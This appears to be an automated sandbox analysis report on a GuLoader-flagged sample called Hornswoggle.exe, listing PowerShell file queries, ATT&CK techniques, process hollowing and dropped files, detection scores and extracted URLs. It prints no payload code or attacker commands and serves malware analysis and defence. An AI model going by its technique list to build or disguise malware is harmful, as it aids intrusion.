    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeCode function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040322B

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation    		1
    DLL Side-Loading    		1
    Access Token Manipulation    		1
    Masquerading    		OS Credential Dumping1
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		1
    Encrypted Channel    		Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault Accounts1
    Shared Modules    		Boot or Logon Initialization Scripts111
    Process Injection    		1
    Access Token Manipulation    		LSASS Memory1
    Process Discovery    		Remote Desktop Protocol1
    Clipboard Data    		Junk DataExfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    PowerShell    		Logon Script (Windows)1
    DLL Side-Loading    		111
    Process Injection    		Security Account Manager1
    Application Window Discovery    		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Obfuscated Files or Information    		NTDS2
    File and Directory Discovery    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Software Packing    		LSA Secrets14
    System Information Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1583356 Sample: Hornswoggle.exe Startdate: 02/01/2025 Architecture: WINDOWS Score: 76 26 Multi AV Scanner detection for submitted file 2->26 28 Yara detected GuLoader 2->28 30 Machine Learning detection for sample 2->30 7 Hornswoggle.exe 34 2->7         started        process3 file4 22 C:\Users\user\AppData\...\Udateret90.Lis, Unicode 7->22 dropped 24 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 7->24 dropped 32 Suspicious powershell command line found 7->32 11 powershell.exe 28 7->11         started        signatures5 process6 signatures7 34 Sample uses process hollowing technique 11->34 36 Found suspicious powershell code related to unpacking or dynamic code loading 11->36 38 Loading BitLocker PowerShell Module 11->38 14 conhost.exe 11->14         started        16 msiexec.exe 11->16         started        18 msiexec.exe 11->18         started        20 36 other processes 11->20 process8

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Hornswoggle.exe50%ReversingLabsWin32.Ransomware.GuLoader
    Hornswoggle.exe72%VirustotalBrowse
    Hornswoggle.exe100%Joe Sandbox ML

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\nsnA627.tmp\nsExec.dll0%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://pesterbdd.com/images/Pester.png40%Avira URL Cloudsafe
    http://crl.microso0%Avira URL Cloudsafe
    http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
    http://nsis.sf.net/NSIS_Error0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://pesterbdd.com/images/Pester.png4powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://github.com/Pester/Pester4powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.23285471388.00000000060AD000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://nsis.sf.net/NSIS_ErrorHornswoggle.exefalse
        • Avira URL Cloud: safe
        		unknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://crl.microsopowershell.exe, 00000002.00000002.23278768511.0000000002DD7000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.23281289650.0000000005041000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/powershell.exe, 00000002.00000002.23285471388.00000000060AD000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.23285471388.00000000060AD000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Licensepowershell.exe, 00000002.00000002.23285471388.00000000060AD000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Iconpowershell.exe, 00000002.00000002.23285471388.00000000060AD000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.quovadis.bm0powershell.exe, 00000002.00000002.23279024605.00000000032AB000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://nsis.sf.net/NSIS_ErrorErrorHornswoggle.exefalse
                            • Avira URL Cloud: safe
                            		unknown
